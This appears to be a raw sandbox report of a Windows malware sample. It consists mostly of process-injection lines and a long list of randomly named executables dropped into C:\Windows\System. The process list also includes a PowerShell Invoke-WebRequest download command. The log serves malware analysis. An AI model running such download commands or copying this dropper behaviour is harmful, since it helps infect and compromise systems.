PID 2336 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\JfgLGHW.exe
PID 2336 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\JfgLGHW.exe
PID 2336 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\JfgLGHW.exe
PID 2336 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\kjcOpML.exe
PID 2336 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\kjcOpML.exe
PID 2336 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\kjcOpML.exe
PID 2336 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\AGVmJaZ.exe
PID 2336 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\AGVmJaZ.exe
PID 2336 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\AGVmJaZ.exe
PID 2336 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\WtEsAsF.exe
PID 2336 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\WtEsAsF.exe
PID 2336 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\WtEsAsF.exe
PID 2336 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\DziatgR.exe
PID 2336 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\DziatgR.exe
PID 2336 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\DziatgR.exe
PID 2336 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\OEcZzup.exe
PID 2336 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\OEcZzup.exe
PID 2336 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\OEcZzup.exe
PID 2336 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\MSaQWKO.exe
PID 2336 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\MSaQWKO.exe
PID 2336 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\MSaQWKO.exe
PID 2336 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\yQATNuk.exe
PID 2336 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\yQATNuk.exe
PID 2336 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\yQATNuk.exe
PID 2336 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\MABiMax.exe
PID 2336 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\MABiMax.exe
PID 2336 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\MABiMax.exe
PID 2336 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\jLZiWFK.exe
PID 2336 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\jLZiWFK.exe
PID 2336 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\jLZiWFK.exe
PID 2336 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\yyIEfSj.exe
PID 2336 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\yyIEfSj.exe
PID 2336 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\yyIEfSj.exe
PID 2336 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\AvxBQdq.exe
PID 2336 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\AvxBQdq.exe
PID 2336 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\AvxBQdq.exe
PID 2336 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\teDwzKF.exe
PID 2336 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\teDwzKF.exe
PID 2336 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\teDwzKF.exe
PID 2336 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ahoTtEV.exe
PID 2336 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ahoTtEV.exe
PID 2336 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ahoTtEV.exe
PID 2336 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\nKIPfDj.exe
PID 2336 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\nKIPfDj.exe
PID 2336 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\nKIPfDj.exe
PID 2336 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\TycqBwB.exe
PID 2336 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\TycqBwB.exe
PID 2336 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\TycqBwB.exe
PID 2336 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\wcuFeQH.exe
PID 2336 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\wcuFeQH.exe
PID 2336 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\wcuFeQH.exe
PID 2336 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\EiiDYHh.exe
PID 2336 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\EiiDYHh.exe
PID 2336 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\EiiDYHh.exe
PID 2336 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\zrKPWlk.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\ugdcyMP.exe

C:\Windows\System\ugdcyMP.exe

C:\Windows\System\dJDbpxk.exe

C:\Windows\System\dJDbpxk.exe

C:\Windows\System\JfgLGHW.exe

C:\Windows\System\JfgLGHW.exe

C:\Windows\System\kjcOpML.exe

C:\Windows\System\kjcOpML.exe

C:\Windows\System\AGVmJaZ.exe

C:\Windows\System\AGVmJaZ.exe

C:\Windows\System\WtEsAsF.exe

C:\Windows\System\WtEsAsF.exe

C:\Windows\System\DziatgR.exe

C:\Windows\System\DziatgR.exe

C:\Windows\System\OEcZzup.exe

C:\Windows\System\OEcZzup.exe

C:\Windows\System\MSaQWKO.exe

C:\Windows\System\MSaQWKO.exe

C:\Windows\System\yQATNuk.exe

C:\Windows\System\yQATNuk.exe

C:\Windows\System\MABiMax.exe

C:\Windows\System\MABiMax.exe

C:\Windows\System\jLZiWFK.exe

C:\Windows\System\jLZiWFK.exe

C:\Windows\System\yyIEfSj.exe

C:\Windows\System\yyIEfSj.exe

C:\Windows\System\AvxBQdq.exe

C:\Windows\System\AvxBQdq.exe

C:\Windows\System\teDwzKF.exe

C:\Windows\System\teDwzKF.exe

C:\Windows\System\ahoTtEV.exe

C:\Windows\System\ahoTtEV.exe

C:\Windows\System\nKIPfDj.exe

C:\Windows\System\nKIPfDj.exe

C:\Windows\System\TycqBwB.exe

C:\Windows\System\TycqBwB.exe

C:\Windows\System\wcuFeQH.exe

C:\Windows\System\wcuFeQH.exe

C:\Windows\System\EiiDYHh.exe

C:\Windows\System\EiiDYHh.exe

C:\Windows\System\zrKPWlk.exe

C:\Windows\System\zrKPWlk.exe

C:\Windows\System\sgDfEfG.exe

C:\Windows\System\sgDfEfG.exe

C:\Windows\System\SYKMGRl.exe

C:\Windows\System\SYKMGRl.exe

C:\Windows\System\DNkGzzA.exe

C:\Windows\System\DNkGzzA.exe

C:\Windows\System\jxAvUkM.exe

C:\Windows\System\jxAvUkM.exe

C:\Windows\System\dYvTSwE.exe

C:\Windows\System\dYvTSwE.exe

C:\Windows\System\jTcWSGa.exe

C:\Windows\System\jTcWSGa.exe

C:\Windows\System\DUcRXOH.exe

C:\Windows\System\DUcRXOH.exe

C:\Windows\System\sNqMiiZ.exe

C:\Windows\System\sNqMiiZ.exe

C:\Windows\System\eYWkAcm.exe

C:\Windows\System\eYWkAcm.exe

C:\Windows\System\yEXWWEx.exe

C:\Windows\System\yEXWWEx.exe

C:\Windows\System\fcqXfls.exe

C:\Windows\System\fcqXfls.exe

C:\Windows\System\KZrzXHc.exe

C:\Windows\System\KZrzXHc.exe

C:\Windows\System\DeOuVgp.exe

C:\Windows\System\DeOuVgp.exe

C:\Windows\System\EQzRpRG.exe

C:\Windows\System\EQzRpRG.exe

C:\Windows\System\yZqRqAc.exe

C:\Windows\System\yZqRqAc.exe

C:\Windows\System\oRDWdew.exe

C:\Windows\System\oRDWdew.exe

C:\Windows\System\vfUTRVM.exe

C:\Windows\System\vfUTRVM.exe

C:\Windows\System\JETKhCT.exe

C:\Windows\System\JETKhCT.exe

C:\Windows\System\FbDcfep.exe

C:\Windows\System\FbDcfep.exe

C:\Windows\System\drshuKh.exe

C:\Windows\System\drshuKh.exe

C:\Windows\System\MzpjFPC.exe

C:\Windows\System\MzpjFPC.exe

C:\Windows\System\OLTgaWi.exe

C:\Windows\System\OLTgaWi.exe

C:\Windows\System\yjoHDQH.exe

C:\Windows\System\yjoHDQH.exe

C:\Windows\System\WiWXfHk.exe

C:\Windows\System\WiWXfHk.exe

C:\Windows\System\QEOKTTx.exe

C:\Windows\System\QEOKTTx.exe

C:\Windows\System\OaxRYtT.exe

C:\Windows\System\OaxRYtT.exe

C:\Windows\System\BcNcNkH.exe

C:\Windows\System\BcNcNkH.exe

C:\Windows\System\OdoyAaD.exe

C:\Windows\System\OdoyAaD.exe

C:\Windows\System\JzDKgiM.exe

C:\Windows\System\JzDKgiM.exe

C:\Windows\System\QXsNSuR.exe

C:\Windows\System\QXsNSuR.exe

C:\Windows\System\DSvfXgD.exe

C:\Windows\System\DSvfXgD.exe

C:\Windows\System\Uahsski.exe

C:\Windows\System\Uahsski.exe

C:\Windows\System\RzJZxwx.exe

C:\Windows\System\RzJZxwx.exe

C:\Windows\System\dKYIowa.exe

C:\Windows\System\dKYIowa.exe

C:\Windows\System\pgLbfum.exe

C:\Windows\System\pgLbfum.exe

C:\Windows\System\EyYPRvH.exe

C:\Windows\System\EyYPRvH.exe

C:\Windows\System\AuArurr.exe

C:\Windows\System\AuArurr.exe

C:\Windows\System\OROYZAq.exe

C:\Windows\System\OROYZAq.exe

C:\Windows\System\CjMFwbw.exe

C:\Windows\System\CjMFwbw.exe

C:\Windows\System\AekkuuD.exe

C:\Windows\System\AekkuuD.exe

C:\Windows\System\NDblhwn.exe

C:\Windows\System\NDblhwn.exe

C:\Windows\System\atvrXOX.exe

C:\Windows\System\atvrXOX.exe

C:\Windows\System\nODlZnS.exe

C:\Windows\System\nODlZnS.exe

C:\Windows\System\OatHwKk.exe

C:\Windows\System\OatHwKk.exe

C:\Windows\System\HZdtGXw.exe

C:\Windows\System\HZdtGXw.exe

C:\Windows\System\AXpupuT.exe

C:\Windows\System\AXpupuT.exe

C:\Windows\System\kacNAGF.exe

C:\Windows\System\kacNAGF.exe

C:\Windows\System\QkgxdVy.exe

C:\Windows\System\QkgxdVy.exe

C:\Windows\System\pkkiULP.exe

C:\Windows\System\pkkiULP.exe

C:\Windows\System\GzrSltU.exe

C:\Windows\System\GzrSltU.exe

C:\Windows\System\fJdpXQA.exe

C:\Windows\System\fJdpXQA.exe

C:\Windows\System\vJOFXFw.exe

C:\Windows\System\vJOFXFw.exe

C:\Windows\System\YlPkGsU.exe

C:\Windows\System\YlPkGsU.exe

C:\Windows\System\kjUwFFP.exe

C:\Windows\System\kjUwFFP.exe

C:\Windows\System\cQWPHHL.exe

C:\Windows\System\cQWPHHL.exe

C:\Windows\System\PotqswV.exe

C:\Windows\System\PotqswV.exe

C:\Windows\System\BKHZDIh.exe

C:\Windows\System\BKHZDIh.exe

C:\Windows\System\dCVNxqc.exe

C:\Windows\System\dCVNxqc.exe

C:\Windows\System\SxaqTkD.exe

C:\Windows\System\SxaqTkD.exe

C:\Windows\System\ooGEDoh.exe

C:\Windows\System\ooGEDoh.exe

C:\Windows\System\HAboobG.exe

C:\Windows\System\HAboobG.exe

C:\Windows\System\fYRataX.exe

C:\Windows\System\fYRataX.exe

C:\Windows\System\QDhnEcb.exe

C:\Windows\System\QDhnEcb.exe

C:\Windows\System\IbCeMzq.exe

C:\Windows\System\IbCeMzq.exe

C:\Windows\System\Ufkricf.exe

C:\Windows\System\Ufkricf.exe

C:\Windows\System\fpSjZZH.exe

C:\Windows\System\fpSjZZH.exe

C:\Windows\System\Nxiglhw.exe

C:\Windows\System\Nxiglhw.exe

C:\Windows\System\kpFoNHM.exe

C:\Windows\System\kpFoNHM.exe

C:\Windows\System\DMcGSUu.exe

C:\Windows\System\DMcGSUu.exe

C:\Windows\System\WOCmCbL.exe

C:\Windows\System\WOCmCbL.exe

C:\Windows\System\DpWaqvG.exe

C:\Windows\System\DpWaqvG.exe

C:\Windows\System\LaQCicw.exe

C:\Windows\System\LaQCicw.exe

C:\Windows\System\aQOzSzE.exe

C:\Windows\System\aQOzSzE.exe

C:\Windows\System\jIjwRqZ.exe

C:\Windows\System\jIjwRqZ.exe

C:\Windows\System\QhAlrIL.exe

C:\Windows\System\QhAlrIL.exe

C:\Windows\System\KtTcnLN.exe

C:\Windows\System\KtTcnLN.exe

C:\Windows\System\sZkjsyr.exe

C:\Windows\System\sZkjsyr.exe

C:\Windows\System\VCMSroA.exe

C:\Windows\System\VCMSroA.exe

C:\Windows\System\LKWHrIi.exe

C:\Windows\System\LKWHrIi.exe

C:\Windows\System\BgsiCio.exe

C:\Windows\System\BgsiCio.exe

C:\Windows\System\zAAWfvb.exe

C:\Windows\System\zAAWfvb.exe

C:\Windows\System\HEGZwMl.exe

C:\Windows\System\HEGZwMl.exe

C:\Windows\System\kHJkFIW.exe

C:\Windows\System\kHJkFIW.exe

C:\Windows\System\jzVXLuZ.exe

C:\Windows\System\jzVXLuZ.exe

C:\Windows\System\KUWKyeB.exe

C:\Windows\System\KUWKyeB.exe

C:\Windows\System\SgpjrGL.exe

C:\Windows\System\SgpjrGL.exe

C:\Windows\System\anKUzKT.exe

C:\Windows\System\anKUzKT.exe

C:\Windows\System\JuvAjNO.exe

C:\Windows\System\JuvAjNO.exe

C:\Windows\System\sgRONvb.exe

C:\Windows\System\sgRONvb.exe

C:\Windows\System\vLbXsPu.exe

C:\Windows\System\vLbXsPu.exe

C:\Windows\System\UwpEIBd.exe

C:\Windows\System\UwpEIBd.exe

C:\Windows\System\IwxVuhB.exe

C:\Windows\System\IwxVuhB.exe

C:\Windows\System\sUWnOFn.exe

C:\Windows\System\sUWnOFn.exe

C:\Windows\System\FBhhEQj.exe

C:\Windows\System\FBhhEQj.exe

C:\Windows\System\XpVpcEF.exe

C:\Windows\System\XpVpcEF.exe

C:\Windows\System\uqPUfUj.exe

C:\Windows\System\uqPUfUj.exe

C:\Windows\System\qEhbhMS.exe

C:\Windows\System\qEhbhMS.exe

C:\Windows\System\pjQrzpu.exe

C:\Windows\System\pjQrzpu.exe

C:\Windows\System\OuRAMNI.exe

C:\Windows\System\OuRAMNI.exe

C:\Windows\System\MeuwhKl.exe

C:\Windows\System\MeuwhKl.exe

C:\Windows\System\NOUoHwp.exe

C:\Windows\System\NOUoHwp.exe

C:\Windows\System\FdKsmiJ.exe

C:\Windows\System\FdKsmiJ.exe

C:\Windows\System\crMBXUe.exe

C:\Windows\System\crMBXUe.exe

C:\Windows\System\BJDCgAA.exe

C:\Windows\System\BJDCgAA.exe

C:\Windows\System\rXJwSTf.exe

C:\Windows\System\rXJwSTf.exe

C:\Windows\System\lqyDAzL.exe

C:\Windows\System\lqyDAzL.exe

C:\Windows\System\YIgrqUw.exe

C:\Windows\System\YIgrqUw.exe

C:\Windows\System\XPtGWNB.exe

C:\Windows\System\XPtGWNB.exe

C:\Windows\System\labpYYL.exe

C:\Windows\System\labpYYL.exe

C:\Windows\System\DjuGqVa.exe

C:\Windows\System\DjuGqVa.exe

C:\Windows\System\uoXFzEQ.exe

C:\Windows\System\uoXFzEQ.exe

C:\Windows\System\dIPiPDy.exe

C:\Windows\System\dIPiPDy.exe

C:\Windows\System\BagwnMH.exe

C:\Windows\System\BagwnMH.exe

C:\Windows\System\rnrtobZ.exe

C:\Windows\System\rnrtobZ.exe

C:\Windows\System\zAWYztS.exe

C:\Windows\System\zAWYztS.exe

C:\Windows\System\IwUzpxT.exe

C:\Windows\System\IwUzpxT.exe

C:\Windows\System\aSbcEJX.exe

C:\Windows\System\aSbcEJX.exe

C:\Windows\System\AwIgPfz.exe

C:\Windows\System\AwIgPfz.exe

C:\Windows\System\zDVNfht.exe

C:\Windows\System\zDVNfht.exe

C:\Windows\System\ULyGrxh.exe

C:\Windows\System\ULyGrxh.exe

C:\Windows\System\UBkANtZ.exe

C:\Windows\System\UBkANtZ.exe

C:\Windows\System\LZPNqfX.exe

C:\Windows\System\LZPNqfX.exe

C:\Windows\System\lKwigLk.exe

C:\Windows\System\lKwigLk.exe

C:\Windows\System\ahZBfZb.exe

C:\Windows\System\ahZBfZb.exe

C:\Windows\System\rLHEwYr.exe

C:\Windows\System\rLHEwYr.exe

C:\Windows\System\FBGVSHG.exe

C:\Windows\System\FBGVSHG.exe

C:\Windows\System\tTeybXZ.exe

C:\Windows\System\tTeybXZ.exe

C:\Windows\System\hYlDcpK.exe

C:\Windows\System\hYlDcpK.exe

C:\Windows\System\GVsbnjL.exe

C:\Windows\System\GVsbnjL.exe

C:\Windows\System\GxHZjTp.exe

C:\Windows\System\GxHZjTp.exe

C:\Windows\System\vxwrInM.exe

C:\Windows\System\vxwrInM.exe

C:\Windows\System\HdhcNeZ.exe

C:\Windows\System\HdhcNeZ.exe

C:\Windows\System\fJycIHb.exe

C:\Windows\System\fJycIHb.exe

C:\Windows\System\VCYXQHJ.exe

C:\Windows\System\VCYXQHJ.exe

C:\Windows\System\wVLLaZG.exe

C:\Windows\System\wVLLaZG.exe

C:\Windows\System\eDDHrme.exe

C:\Windows\System\eDDHrme.exe

C:\Windows\System\rcJVnDy.exe

C:\Windows\System\rcJVnDy.exe

C:\Windows\System\qntXEJR.exe

C:\Windows\System\qntXEJR.exe

C:\Windows\System\sEKpFLo.exe

C:\Windows\System\sEKpFLo.exe

C:\Windows\System\kYWJeZW.exe

C:\Windows\System\kYWJeZW.exe

C:\Windows\System\ccPCBGv.exe

C:\Windows\System\ccPCBGv.exe

C:\Windows\System\KdhSamk.exe

C:\Windows\System\KdhSamk.exe

C:\Windows\System\dNEwQFF.exe

C:\Windows\System\dNEwQFF.exe

C:\Windows\System\lkeNpin.exe

C:\Windows\System\lkeNpin.exe

C:\Windows\System\srDepuj.exe

C:\Windows\System\srDepuj.exe

C:\Windows\System\CHsxQmL.exe

C:\Windows\System\CHsxQmL.exe

C:\Windows\System\SIWaBFV.exe

C:\Windows\System\SIWaBFV.exe

C:\Windows\System\KBcBtWy.exe

C:\Windows\System\KBcBtWy.exe

C:\Windows\System\wXFLJZe.exe

C:\Windows\System\wXFLJZe.exe

C:\Windows\System\GhPISCq.exe

C:\Windows\System\GhPISCq.exe

C:\Windows\System\QFvazFu.exe

C:\Windows\System\QFvazFu.exe

C:\Windows\System\fodTcVH.exe

C:\Windows\System\fodTcVH.exe

C:\Windows\System\uikdTIZ.exe

C:\Windows\System\uikdTIZ.exe

C:\Windows\System\OEwyTvW.exe

C:\Windows\System\OEwyTvW.exe

C:\Windows\System\QCVxhiF.exe

C:\Windows\System\QCVxhiF.exe

C:\Windows\System\PXEMjRc.exe

C:\Windows\System\PXEMjRc.exe

C:\Windows\System\KmuLaiN.exe

C:\Windows\System\KmuLaiN.exe

C:\Windows\System\FcBbEUz.exe

C:\Windows\System\FcBbEUz.exe

C:\Windows\System\RypetVH.exe

C:\Windows\System\RypetVH.exe

C:\Windows\System\HDRijYz.exe

C:\Windows\System\HDRijYz.exe

C:\Windows\System\MPYxUWP.exe

C:\Windows\System\MPYxUWP.exe

C:\Windows\System\nTrKFbm.exe

C:\Windows\System\nTrKFbm.exe

C:\Windows\System\yuQyiCE.exe

C:\Windows\System\yuQyiCE.exe

C:\Windows\System\iFTZhiY.exe

C:\Windows\System\iFTZhiY.exe

C:\Windows\System\OgcGBEZ.exe

C:\Windows\System\OgcGBEZ.exe

C:\Windows\System\PdzPgUL.exe

C:\Windows\System\PdzPgUL.exe

C:\Windows\System\YHmCOzA.exe

C:\Windows\System\YHmCOzA.exe

C:\Windows\System\toiJUZq.exe

C:\Windows\System\toiJUZq.exe

C:\Windows\System\XeprHzz.exe

C:\Windows\System\XeprHzz.exe

C:\Windows\System\NOPoFtg.exe

C:\Windows\System\NOPoFtg.exe

C:\Windows\System\MnokotE.exe

C:\Windows\System\MnokotE.exe

C:\Windows\System\aDaRrVL.exe

C:\Windows\System\aDaRrVL.exe

C:\Windows\System\PkLHoco.exe

C:\Windows\System\PkLHoco.exe

C:\Windows\System\NZUJAHX.exe

C:\Windows\System\NZUJAHX.exe

C:\Windows\System\phIlqbr.exe

C:\Windows\System\phIlqbr.exe

C:\Windows\System\RMcaHcc.exe

C:\Windows\System\RMcaHcc.exe

C:\Windows\System\nrNGHJf.exe

C:\Windows\System\nrNGHJf.exe

C:\Windows\System\ptGhfqF.exe

C:\Windows\System\ptGhfqF.exe

C:\Windows\System\PYdROmW.exe

C:\Windows\System\PYdROmW.exe

C:\Windows\System\COJBiWq.exe

C:\Windows\System\COJBiWq.exe

C:\Windows\System\YJHSEdo.exe

C:\Windows\System\YJHSEdo.exe

C:\Windows\System\riNzCMS.exe

C:\Windows\System\riNzCMS.exe

C:\Windows\System\LirjfZX.exe

C:\Windows\System\LirjfZX.exe

C:\Windows\System\QvUgnxX.exe

C:\Windows\System\QvUgnxX.exe

C:\Windows\System\ZPMoDaG.exe

C:\Windows\System\ZPMoDaG.exe

C:\Windows\System\LDbyrRj.exe

C:\Windows\System\LDbyrRj.exe

C:\Windows\System\cgDxFVb.exe

C:\Windows\System\cgDxFVb.exe

C:\Windows\System\qJoSKMq.exe

C:\Windows\System\qJoSKMq.exe

C:\Windows\System\TgTLetS.exe

C:\Windows\System\TgTLetS.exe

C:\Windows\System\oznfxkz.exe

C:\Windows\System\oznfxkz.exe

C:\Windows\System\PqKWlTP.exe

C:\Windows\System\PqKWlTP.exe

C:\Windows\System\GSCytbh.exe

C:\Windows\System\GSCytbh.exe

C:\Windows\System\xCezsXB.exe

C:\Windows\System\xCezsXB.exe

C:\Windows\System\ewkARdA.exe

C:\Windows\System\ewkARdA.exe

C:\Windows\System\RkQRVRm.exe

C:\Windows\System\RkQRVRm.exe

C:\Windows\System\kfgtRaW.exe

C:\Windows\System\kfgtRaW.exe

C:\Windows\System\ADtrHBD.exe

C:\Windows\System\ADtrHBD.exe

C:\Windows\System\bDzfPSD.exe

C:\Windows\System\bDzfPSD.exe

C:\Windows\System\qxqcUoK.exe

C:\Windows\System\qxqcUoK.exe

C:\Windows\System\YJiGlfe.exe

C:\Windows\System\YJiGlfe.exe

C:\Windows\System\iCjIYUw.exe

C:\Windows\System\iCjIYUw.exe

C:\Windows\System\jhpVDGz.exe

C:\Windows\System\jhpVDGz.exe

C:\Windows\System\UjOHcxI.exe

C:\Windows\System\UjOHcxI.exe

C:\Windows\System\IVDKywY.exe

C:\Windows\System\IVDKywY.exe

C:\Windows\System\PtObMiC.exe

C:\Windows\System\PtObMiC.exe

C:\Windows\System\yhTIvbn.exe

C:\Windows\System\yhTIvbn.exe

C:\Windows\System\poEWFDB.exe

C:\Windows\System\poEWFDB.exe

C:\Windows\System\MpgyBlx.exe

C:\Windows\System\MpgyBlx.exe

C:\Windows\System\DmYLCqn.exe

C:\Windows\System\DmYLCqn.exe

C:\Windows\System\LtcZbSn.exe

C:\Windows\System\LtcZbSn.exe

C:\Windows\System\fvxmiBG.exe

C:\Windows\System\fvxmiBG.exe

C:\Windows\System\baXrdoT.exe

C:\Windows\System\baXrdoT.exe

C:\Windows\System\RmHOxXr.exe

C:\Windows\System\RmHOxXr.exe

C:\Windows\System\pDKwTJg.exe

C:\Windows\System\pDKwTJg.exe

C:\Windows\System\LoOAjGP.exe

C:\Windows\System\LoOAjGP.exe

C:\Windows\System\xnsEHhX.exe

